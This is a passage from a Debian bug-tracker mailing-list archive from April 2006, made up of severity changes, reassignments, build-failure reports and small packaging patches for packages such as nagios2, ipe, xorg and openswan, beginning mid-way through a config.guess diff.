i*:windows32*:*) # uname -m includes -pc on this system. echo ${UNAME_MACHINE}-mingw32 @@ -779,8 +790,11 @@ i*:PW*:*) echo ${UNAME_MACHINE}-pc-pw32 exit ;; -x86:Interix*:[34]*) - echo i586-pc-interix${UNAME_RELEASE}|sed -e 's/\..*//' +x86:Interix*:[345]*) + echo i586-pc-interix${UNAME_RELEASE} + exit ;; +EM64T:Interix*:[345]*) + echo x86_64-unknown-interix${UNAME_RELEASE} exit ;; [345]86:Windows_95:* | [345]86:Windows_98:* | [345]86:Windows_NT:*) echo i${UNAME_MACHINE}-pc-mks @@ -851,7 +865,11 @@ #endif #endif EOF - eval `$CC_FOR_BUILD -E $dummy.c 2/dev/null | grep ^CPU=` + eval `$CC_FOR_BUILD -E $dummy.c 2/dev/null | sed -n ' + /^CPU/{ + s: ::g + p + }'` test x${CPU} != x { echo ${CPU}-unknown-linux-gnu; exit; } ;; mips64:Linux:*:*) @@ -870,7 +888,11 @@ #endif #endif EOF - eval `$CC_FOR_BUILD -E $dummy.c 2/dev/null | grep ^CPU=` + eval `$CC_FOR_BUILD -E $dummy.c 2/dev/null | sed -n ' + /^CPU/{ + s: ::g + p + }'` test x${CPU} != x { echo ${CPU}-unknown-linux-gnu; exit; } ;; or32:Linux:*:*) @@ -919,6 +941,9 @@ sparc:Linux:*:* | sparc64:Linux:*:*) echo ${UNAME_MACHINE}-unknown-linux-gnu exit ;; +vax:Linux:*:*) + echo ${UNAME_MACHINE}-dec-linux-gnu + exit ;; x86_64:Linux:*:*) echo x86_64-unknown-linux-gnu exit ;; @@ -964,7 +989,7 @@ LIBC=gnulibc1 # endif #else - #ifdef __INTEL_COMPILER + #if
Processed: Re: dvilib2: directory /usr/share/DVIlib2 is missing in testing version of the package
Processing commands for [EMAIL PROTECTED]: clone 358135 -1 Bug#358135: dvilib2: directory /usr/share/DVIlib2 is missing in testing version of the package Bug 358135 cloned as bug 361944. reassign -1 vflib3-dev 3.6.13-3 Bug#361944: dvilib2: directory /usr/share/DVIlib2 is missing in testing version of the package Bug reassigned from package `dvilib2' to `vflib3-dev'. severity -1 serious Bug#361944: dvilib2: directory /usr/share/DVIlib2 is missing in testing version of the package Severity set to `serious'. retitle -1 vflib3-dev: missing dependencies on libttf-dev and libt1-dev for .la files Bug#361944: dvilib2: directory /usr/share/DVIlib2 is missing in testing version of the package Changed Bug title. tags -1 patch Bug#361944: vflib3-dev: missing dependencies on libttf-dev and libt1-dev for .la files There were no tags set. Tags added: patch thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#334697: apt-listbugs does not show several grave/serious bugs
Processing commands for [EMAIL PROTECTED]: tags 334697 -fixed Bug#334697: apt-listbugs does not show several grave/serious bugs Tags were: fixed Tags removed: fixed severity 334697 serious Bug#334697: apt-listbugs does not show several grave/serious bugs Severity set to `serious'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361904: Failed to load application: libstdc++.so.6: cannot handle TLS data
reassign 361904 libstdc++6 severity 361904 critical merge 360776 361904 thanks On Tue, Apr 11, 2006 at 09:13:35AM +0200, Matteo Calorio wrote: Package: apt-proxy Version: 1.9.33-0.1 Severity: grave Justification: renders package unusable *** Please type your report below this line *** # /etc/init.d/apt-proxy start Starting apt-proxy Failed to load application: libstdc++.so.6: cannot handle TLS data This is a bug in libstdc++.so.6, not in apt-proxy. A fix is being worked on; in the meantime, you might want to consider upgrading to a 2.6 kernel, since Debian isn't releasing any supported 2.4 kernels with etch. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Bug#361908: xorg - FTBFS: debian/scripts/vars.s390: No such file or directory
severity 361908 important user debian-release@lists.debian.org usertag 361908 rc-s390 thanks :/ On Tue, Apr 11, 2006 at 09:50:38AM +0200, Bastian Blank wrote: Package: xorg Version: 1:7.0.10 Severity: serious There was an error while trying to autobuild your package: Automatic build of xorg_1:7.0.10 on debian-31 by sbuild/s390 85 [...] /usr/bin/fakeroot debian/rules clean debian/rules:39: debian/scripts/vars.s390: No such file or directory make: *** No rule to make target `debian/scripts/vars.s390'. Stop. ** Build finished at 20060410-2236 FAILED [dpkg-buildpackage died] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] Unfortunately, the wrong severity for an architecture that's currently not RC. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Bug#361939: lessdisks-terminal: Depends: devfsd, but no 2.4 kernels planned for etch
Package: lessdisks-terminal Version: 0.5.3cvs.20040906-16 Severity: serious Hi Jonas, The lessdisks-termianl package depends on devfsd. In addition to simply being RC-buggy, devfsd is not useful with current 2.6 kernels; and no 2.4 kernels are planned for the etch release. I'm removing devfsd from etch for bug #306990, so lessdisks is not releasable with this dependency. If lessdisks-terminal is compatible with 2.6 kernels, please remove the dependency on devfsd. If it isn't, please update it so that it is compatible. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Processed: Re: Bug#361854: function *() php/apache Crash PHP 4.4.2 and 5.1.2
Processing commands for [EMAIL PROTECTED]: Version: 4:4.4.2-1 Unknown command or malformed arguments to command. severity 361854 important Bug#361854: function *() php/apache Crash PHP 4.4.2 and 5.1.2 Severity set to `important'. severity 361855 important Bug#361855: tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2 Severity set to `important'. severity 361856 important Bug#361856: copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2 Severity set to `important'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#361919 acknowledged by developer (Re: [exim-dev] Dropping all hosts with ignore_target_hosts results in host lookup did not complete)
Processing commands for [EMAIL PROTECTED]: found #361919 4.50-8sarge1 Bug#361919: exim4: Dropping all hosts with ignore_target_hosts results in host lookup did not complete Bug marked as found in version 4.50-8sarge1. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#358981: enigmail: FTBFS on powerpc
severity 358981 important thanks Since enigmail has no previous binaries in the archive for powerpc, this bug is not release-critical. Thanks, -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Processed: Re: Bug#361909: xserver-xorg-input-digitaledge - FTBFS: Wrong architecture line
Processing commands for [EMAIL PROTECTED]: severity 361909 normal Bug#361909: xserver-xorg-input-digitaledge - FTBFS: Wrong architecture line Severity set to `normal'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#361827: libgdal1-grass: fails to read GRASS vectors
Processing commands for [EMAIL PROTECTED]: reassign 361827 libgdal1-1.3.1-grass Bug#361827: libgdal1-grass: fails to read GRASS vectors Warning: Unknown package 'libgdal1-grass' Bug reassigned from package `libgdal1-grass' to `libgdal1-1.3.1-grass'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: severity of 361919 is serious
Processing commands for [EMAIL PROTECTED]: severity 361919 serious Bug#361919: exim4: Dropping all hosts with ignore_target_hosts results in host lookup did not complete Severity set to `serious'. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361909: xserver-xorg-input-digitaledge - FTBFS: Wrong architecture line
severity 361909 normal thanks On Tue, Apr 11, 2006 at 09:51:11AM +0200, Bastian Blank wrote: Package: xserver-xorg-input-digitaledge Version: 1:1.0.1.3-2 Severity: serious There was an error while trying to autobuild your package: Automatic build of xserver-xorg-input-digitaledge_1:1.0.1.3-2 on debian-31 by sbuild/s390 85 [...] Building Dependency Tree... E: Couldn't find package xserver-xorg-dev apt-get failed. Package installation failed Trying to reinstall removed packages: Trying to uninstall newly installed packages: Source-dependencies not satisfied; skipping xserver-xorg-input-digitaledge ** Finished at 20060410-2257 Build needed 00:00:00, 0k disk space Not RC; the package evidently will build on any architecture where the build-deps are satisfied, so arch: any seems valid to me. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Bug#361827: libgdal1-grass: fails to read GRASS vectors
reassign 361827 libgdal1-1.3.1-grass thanks On Mon, Apr 10, 2006 at 05:10:09PM +0200, Paolo Cavallini wrote: Package: libgdal1-grass Version: 1.3.1 Severity: grave Justification: renders package unusable There is no package of this name in Debian; presumably this should be assigned to libgdal1-1.3.1-grass. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Bug#361805: bug-buddy: fails to update bug information and crashes afterwards
severity 361805 important thanks On Mon, Apr 10, 2006 at 02:38:46PM +0200, Dirk De Groote wrote: Package: bug-buddy Version: 2.8.0-3 Severity: grave Justification: renders package unusable tested on 2 computers, with same result : lauching bug-buddy proposes you to update your bug-information. Clicking update starts downloading 6 (4 on the other box) updates. Then an error message appears : application has quit unexpectedly and you get 3 options : restart app, close or inform developpers ( the latter being impossible since that one tries to launch bug-buddy ...). Selecting restart puts you back in the update loop , this time only requiering 2 updates , but those never succeed ... same loop all over : crash -- restart -- update -- crash -- restart ... etc. So click the don't update button instead? I'm not sure why this functionality is enabled at all in the Debian package of bug-buddy, since updates should happen through the Debian package system and *not* by pulling updates from third-party websites; but in any case, you don't have to agree to update in order to use bug-buddy, so I don't think this warrants a grave severity. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Processed: Re: Bug#361904: Failed to load application: libstdc++.so.6: cannot handle TLS data
Processing commands for [EMAIL PROTECTED]: reassign 361904 libstdc++6 Bug#361904: Failed to load application: libstdc++.so.6: cannot handle TLS data Bug reassigned from package `apt-proxy' to `libstdc++6'. severity 361904 critical Bug#361904: Failed to load application: libstdc++.so.6: cannot handle TLS data Severity set to `critical'. merge 360776 361904 Bug#360776: apt-show-versions: cron.daily fails noisily Bug#361904: Failed to load application: libstdc++.so.6: cannot handle TLS data Mismatch - only Bugs in same state can be merged: Values for `blocked-by' don't match: #360776 has `361675'; #361904 has `' thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#361805: bug-buddy: fails to update bug information and crashes afterwards
Processing commands for [EMAIL PROTECTED]: severity 361805 important Bug#361805: bug-buddy: fails to update bug information and crashes afterwards Severity set to `important'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361940: python-mysqldb: can't be binNMUed due to arch: all - arch: any dep
Package: python-mysqldb Version: 1.2.1c3-6 Severity: grave The python-mysqldb package is uninstallable in unstable because python-mysqldb was binNMUed for the mysqlclient ABI change, and python-mysqldb, an arch: all package, has a dependency on python2.3-mysqldb (= 1.2.1c3-6) which no longer exists. Arch: all - Arch: any strict versioned dependencies are fundamentally incompatible with binNMUs. Please either make a single arch: any python-mysqldb package that Provides: python2.3-mysqldb, or relax the dependency so it can be satisfied by +b1 ... +bN versions of the package. Either way, python-mysqldb currently needs a sourceful upload for the libmysqlclient transition. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Processed: Re: error in postinst script
Processing commands for [EMAIL PROTECTED]: severity 357456 important Bug#357456: error in postinst script Severity set to `important'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361853: marked as done (phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2)
Your message dated Mon, 10 Apr 2006 22:01:02 -0700 with message-id [EMAIL PROTECTED] and subject line Bug#361854: function *() php/apache Crash PHP 4.4.2 and 5.1.2 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) ---BeginMessage--- Package: php4 Version: 4:4.3.10-16 Severity: grave for more informaton see: http://securityreason.com/achievement_securityalert/34 -- Oliver Paulus OpenPGP Key id: 28D9C44F Fingerprint: EADA 62FC 07DC 3361 A3D6 4174 2DE3 C027 28D9 C44F Public Key: http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x28D9C44F pgpZTgHtku1sd.pgp Description: Digitale PGP-Unterschrift ---End Message--- ---BeginMessage--- Version: 4:4.4.2-1 severity 361854 important severity 361855 important severity 361856 important thanks On Mon, Apr 10, 2006 at 11:14:43PM +0200, Oliver Paulus wrote: for more informaton see: http://securityreason.com/achievement_securityalert/34 On Mon, Apr 10, 2006 at 11:14:43PM +0200, Oliver Paulus wrote: for more informaton see: http://securityreason.com/achievement_securityalert/35 On Mon, Apr 10, 2006 at 11:16:11PM +0200, Oliver Paulus wrote: for more informaton see: http://securityreason.com/achievement_securityalert/36 On Mon, Apr 10, 2006 at 11:17:52PM +0200, Oliver Paulus wrote: for more informaton see: http://securityreason.com/achievement_securityalert/37 It is my understanding that all of these bugs are fixed in the etch version of php4; I'm accordingly marking them as closed. In addition, except for the cross-site scripting bug, none of these appear to warrant severity: grave. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature ---End Message---
Bug#306990: lvm2: Strange error when attempting to install
Hi Arthur, It seems this bug still exists in devfsd package. Given that the only kernel planned as part of the etch release is 2.6.16+ which has no support for devfs, perhaps it's time to request removal of devfsd from etch/sid? Thanks, -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Processed: Re: enigmail: FTBFS on powerpc
Processing commands for [EMAIL PROTECTED]: severity 358981 important Bug#358981: enigmail: FTBFS on powerpc Severity set to `important'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#361908: xorg - FTBFS: debian/scripts/vars.s390: No such file or directory
Processing commands for [EMAIL PROTECTED]: severity 361908 important Bug#361908: xorg - FTBFS: debian/scripts/vars.s390: No such file or directory Severity set to `important'. user debian-release@lists.debian.org Setting user to debian-release@lists.debian.org (was [EMAIL PROTECTED]). usertag 361908 rc-s390 There were no usertags set. Usertags are now: rc-s390. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#356916: GFDL/non-free procedure
Dear all! I am moving out the GFDL documentation from the texinfo package and want to ask whether the following procedure is the right way to do it: Current status: source package: texinfo orig file: texinfo_4.8.orig.tar.gz binary packages:texinfo_4.8-8, info_4.8-8 New status: source package: texinfo orig file: texinfo_4.8.dfsg.orig.tar.gz binary packags: texinfo_4.8.dfsg-1, info_4.8.dfsg-1 source package: texinfo-doc-nonfree orig file: texinfo-doc-nonfree_4.8.orig.tar.gz binary package: texinfo-doc-nonfree_4.8-1 Then I probably need something like texinfo-doc-nonfree:Replaces texinfo/info = 4.8-8 Conflicts texinfo/info = 4.8-8 Is this ok? Best wishes Norbert --- Dr. Norbert Preining preining AT logic DOT at Università di Siena gpg DSA: 0x09C5B094 fp: 14DF 2E6C 0307 BE6D AD76 A9C0 D2BF 4AA3 09C5 B094 --- KERRY (n.) The small twist of skin which separated each sausage on a string. --- Douglas Adams, The Meaning of Liff -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361943: ipe: FTBFS (amd64): format '%d' expects type 'int', but argument 3 has type 'size_t'
This one time, at band camp, Andreas Jochens said: Package: ipe Version: 6.0pre26-2 Severity: serious Tags: patch When building 'ipe' on amd64/unstable, I get the following error: make[2]: Entering directory `/ipe-6.0pre26/src/ipetopng' g++ -c -pipe -O2 -D_REENTRANT -Wall -W -Werror -DQT_NO_CAST_FROM_ASCII -DQT_NO_DEBUG -DQT_GUI_LIB -DQT_CORE_LIB -I/usr/share/qt4/mkspecs/linux-g++ -I. -I/usr/include/qt4/QtCore -I/usr/include/qt4/QtGui -I/usr/include/qt4 -I../include -I../ipemodel -I../ipecanvas -I../../build/moc/ipetopng -I. -o ../../build/obj/ipetopng/ipetopng.o ipetopng.cpp cc1plus: warnings being treated as errors ipetopng.cpp: In function 'int topng(const char*, const char*, int, double)': ipetopng.cpp:77: warning: format '%d' expects type 'int', but argument 3 has type 'size_t' diff -urN ../tmp-orig/ipe-6.0pre26/src/ipetopng/ipetopng.cpp ./src/ipetopng/ipetopng.cpp --- ../tmp-orig/ipe-6.0pre26/src/ipetopng/ipetopng.cpp2005-12-14 04:45:59.0 + +++ ./src/ipetopng/ipetopng.cpp 2006-04-11 08:24:57.0 + @@ -73,7 +73,7 @@ } if (pageNum 1 || pageNum int(doc-size())) { fprintf(stderr, - The document contains %d pages, cannot convert page %d.\n, + The document contains %ld pages, cannot convert page %d.\n, doc-size(), pageNum); C99 has introduced the prefix z for size_t, so this should really be written as: + The document contains %zd pages, cannot convert page %d.\n, doc-size(), pageNum); Andreas, can you confirm that this works for you? Take care, -- - | ,''`.Stephen Gran | | : :' :[EMAIL PROTECTED] | | `. `'Debian user, admin, and developer | |`- http://www.debian.org | - signature.asc Description: Digital signature
Bug#361376: liferea segfaults randomly
On 4/11/06, Junichi Uekawa [EMAIL PROTECTED] wrote: Hi. We receive a lot of user reports about crashes with gtkhtml2. And retests with the Mozilla renderer showed that the reason lies withing gtkhtml2. So I assume that it is no Liferea problem. So (at least from the upstream point of view) this won't fix. Please use Mozilla for rendering if you can. It might be just better if you ditched the liferea-gtkhtml package. Why? Only the latest libgtkhtml2 versions are broken. Okay, so, that's not a fundamental problem, but a hopefully transient problem? It might be good to get some bugs marked as 'serious' on gtkhtml so that apt-listbugs users can know it's broken before it's upgraded/installed. I've switched over to mozilla rendering for now. Should be better anyway. Fonts Look uglier, and I don't see a preferences box to fix it... The rendering code reuses the GNOME default application font. This might be ugly, depending of what font you configured :-) But you can overwrite it by supplying a user defined stylesheet as described in the FAQ on the project homepage.
Bug#361943: ipe: FTBFS (amd64): format '%d' expects type 'int', but argument 3 has type 'size_t'
On 06-Apr-11 13:00, Stephen Gran wrote: C99 has introduced the prefix z for size_t, so this should really be written as: + The document contains %zd pages, cannot convert page %d.\n, doc-size(), pageNum); Andreas, can you confirm that this works for you? Yes, this works for me, thanks! Regards Andreas Jochens -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361952: tex4ht-common: Package uninstallable due to missing configuration file
Package: tex4ht-common Version: 20060312-1 Severity: grave Justification: renders package unusable Installing tex4ht-common fails with this error message: update-texmf: Basic configuration file /etc/texmf/texmf.d/05TeXMF.cnf missing. It can be (quick)fixed doing a touch /etc/texmf/texmf.d/05TeXMF.cnf -- System Information: Debian Release: testing/unstable APT prefers testing APT policy: (500, 'testing') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.12-1-686 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages tex4ht-common depends on: ii tetex-bin 2.0.2-31 The teTeX binary files Versions of packages tex4ht-common recommends: ii dvipng1.5-2.1convert PNG graphics from DVI file ii tex4ht20060312-1 LaTeX and TeX for Hypertext (HTML) ii zip 2.31-3 Archiver for .zip files -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361800: Does not compile now
I should have checked before using so much time on trying to get the 2.4.4 version going. The OpenSWAN project released 2.4.5 a few days ago. That version is supposed to work with the 2.6.15 kernel. I don't think I can close this bug as a non-DD. Rene, please do that. I hope you find time soon to package 2.4.5... Thanks, Lupe Christoph -- | You know we're sitting on four million pounds of fuel, one nuclear | | weapon and a thing that has 270,000 moving parts built by the lowest | | bidder. Makes you feel good, doesn't it? | | Rockhound in Armageddon, 1998, about the Space Shuttle | -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361956: nagios2-common: postinstall script uses unconditional chmod/chown, breaking any dpkg-statoverride
Package: nagios2-common Version: 2.1-1 Severity: serious Tags: patch Justification: Policy 10.9.1 As stated in the subject -- the postinstall uses unconditionally chmod/chown. If the local admin tries to change permissions using dpkg-statoverride, these local changes are not respected. -- System Information: Debian Release: testing/unstable Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16.jumper Locale: LANG=C, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) diff -ruN nagios2-2.1/debian/lintian/overrides/nagios2-common nagios2-2.hs/debian/lintian/overrides/nagios2-common --- nagios2-2.1/debian/lintian/overrides/nagios2-common 2006-04-11 14:15:11.0 +0200 +++ nagios2-2.hs/debian/lintian/overrides/nagios2-common1970-01-01 01:00:00.0 +0100 @@ -1 +0,0 @@ -non-standard-file-perm etc/nagios2/resource.cfg 0600 != 0644 diff -ruN nagios2-2.1/debian/nagios2-common.install nagios2-2.hs/debian/nagios2-common.install --- nagios2-2.1/debian/nagios2-common.install 2006-04-11 14:15:11.0 +0200 +++ nagios2-2.hs/debian/nagios2-common.install 2006-04-11 14:09:30.0 +0200 @@ -5,6 +5,5 @@ sample-config/template-object/README /usr/share/doc/nagios2-common/examples/template-object sample-config/template-object/*.cfg /usr/share/doc/nagios2-common/examples/template-object debian/httpd.webapps-common /usr/share/nagios2/debian -debian/lintian/overrides/nagios2-common usr/share/lintian/overrides debian/gateway.cfg usr/share/nagios2/debian debian/extcommands.cfg usr/share/nagios2/debian diff -ruN nagios2-2.1/debian/nagios2-common.postinst nagios2-2.hs/debian/nagios2-common.postinst --- nagios2-2.1/debian/nagios2-common.postinst 2006-04-11 14:15:11.0 +0200 +++ nagios2-2.hs/debian/nagios2-common.postinst 2006-04-11 11:48:57.0 +0200 @@ -20,6 +20,16 @@ # location of the default htpasswd authentication file. htpw=$en/htpasswd.users +# useful functions +setperm() { +local user=$1; shift +local group=$1; shift +local mode=$1; shift +local file=$1; shift +dpkg-statoverride --list $file /dev/null return 0 +dpkg-statoverride --update --add $user $group $mode $file +} + case $1 in configure) if ! getent passwd nagios /dev/null ; then @@ -76,14 +86,15 @@ # explicitly set permissions on some files that are dependent # on the uid/gid of the nagios user, which is dynamically created. - chown root:nagios $en/resource.cfg - chmod 640 $en/resource.cfg -install -d -onagios -gadm -m2751 /var/log/nagios2 -install -d -onagios -gnagios -m750 /var/run/nagios2 -install -d -onagios -gnagios -m750 /var/lib/nagios2 - # chown instead of install to preserve permission bits - chown nagios /var/lib/nagios2/rw -install -d -onagios -gwww-data -m2750 /var/cache/nagios2 + # .hs + # Do not forget to remove these statoverrides when purging the + # package! + setperm root nagios 0640 $en/resource.cfg + setperm nagios adm 2751 /var/log/nagios2 + setperm nagios nagios 0750 /var/run/nagios2 + setperm nagios nagios 0750 /var/lib/nagios2 + setperm nagios www-data 02750 /var/cache/nagios2 + setperm nagios www-data 0700 /var/lib/nagios2/rw # everything went well, so now let's reset the password db_set nagios2/adminpassword diff -ruN nagios2-2.1/debian/nagios2-common.postrm nagios2-2.hs/debian/nagios2-common.postrm --- nagios2-2.1/debian/nagios2-common.postrm2006-04-11 14:15:11.0 +0200 +++ nagios2-2.hs/debian/nagios2-common.postrm 2006-04-11 11:50:02.0 +0200 @@ -13,6 +13,13 @@ ucf --purge /etc/nagios2/apache2.conf ucf --purge /etc/nagios2/conf.d/host-gateway_nagios2.cfg #ucf --purge /etc/nagios2/conf.d/extcommands_nagios2.cfg + + dpkg-statoverride --force --remove /etc/nagios2/resource.cfg + dpkg-statoverride --force --remove /var/log/nagios2 + dpkg-statoverride --force --remove /var/run/nagios2 + dpkg-statoverride --force --remove /var/lib/nagios2 + dpkg-statoverride --force --remove /var/cache/nagios2 + dpkg-statoverride --force --remove /var/lib/nagios2/rw ;; esac diff -ruN nagios2-2.1/debian/rules nagios2-2.hs/debian/rules --- nagios2-2.1/debian/rules2006-04-11 14:15:11.0 +0200 +++ nagios2-2.hs/debian/rules 2006-04-11 14:12:23.0 +0200 @@ -137,10 +137,9 @@ # remove empty directory rmdir --ignore-fail-on-non-empty -p $b/nagios2/var/lib/nagios2/archives # set up /var/cache/nagios2 for access by www-data - chgrp www-data ${bnc}/var/cache/nagios2 - chmod g+s ${bnc}/var/cache/nagios2 - chown root:www-data ${bnc}/var/lib/nagios2/rw - chmod 700 ${bnc}/var/lib/nagios2/rw + # Permissions are set in postinstall using dpkg-statoverride + # for following parts: /var/cache/nagios2 + # /var/lib/nagios2/rw # alter some
Bug#361958: modutils conflicts with manpages-dev. see Bug #360843
Package: modutils Version: 2.4.27.0-5 Severity: critical Justification: breaks unrelated software Unpacking replacement manpages-dev ... dpkg: error processing /var/cache/apt/archives/manpages-dev_2.25-2_all.deb (--unpack): trying to overwrite `/usr/share/man/man2/create_module.2.gz', which is also in package modutils dpkg-deb: subprocess paste killed by signal (Broken pipe) Errors were encountered while processing: /var/cache/apt/archives/manpages-dev_2.25-2_all.deb E: Sub-process /usr/bin/dpkg returned an error code (1) -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16 Locale: LANG=hu_HU, LC_CTYPE=hu_HU (charmap=ISO-8859-2) Versions of packages modutils depends on: ii libc62.3.6-5 GNU C Library: Shared libraries an ii sysvinit 2.86.ds1-14 System-V-like init utilities modutils recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361800: Does not compile now
On Tuesday, 2006-04-11 at 09:42:30 +0200, Lupe Christoph wrote: Hi! Even with the patch I submitted, the resulting kernel does not compile: CC [M] net/ipsec/ipsec_tunnel.o Here is another one: CC [M] net/ipsec/pfkey_v2.o net/ipsec/pfkey_v2.c: In function 'pfkey_destroy_socket': net/ipsec/pfkey_v2.c:464: error: 'struct sk_buff' has no member named 'list' net/ipsec/pfkey_v2.c:466: error: 'struct sk_buff' has no member named 'stamp' net/ipsec/pfkey_v2.c:466: error: 'struct sk_buff' has no member named 'stamp' net/ipsec/pfkey_v2.c: In function 'pfkey_recvmsg': net/ipsec/pfkey_v2.c:1383: error: 'struct sk_buff' has no member named 'stamp' I'm giving up. Rene, the ball is on your side ;-) Lupe Christoph -- | You know we're sitting on four million pounds of fuel, one nuclear | | weapon and a thing that has 270,000 moving parts built by the lowest | | bidder. Makes you feel good, doesn't it? | | Rockhound in Armageddon, 1998, about the Space Shuttle | -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361800: Does not compile now
Am Tuesday 11 April 2006 14:02 schrieb Lupe Christoph: I should have checked before using so much time on trying to get the 2.4.4 version going. The OpenSWAN project released 2.4.5 a few days ago. That version is supposed to work with the 2.6.15 kernel. I don't think I can close this bug as a non-DD. Rene, please do that. I hope you find time soon to package 2.4.5... I'll try to find time for that within the next few days, but I can't promise - very busy right now with other projects -- - Gibraltar firewall http://www.gibraltar.at/ pgpZexcy5E5hn.pgp Description: PGP signature
Processed: Reopen
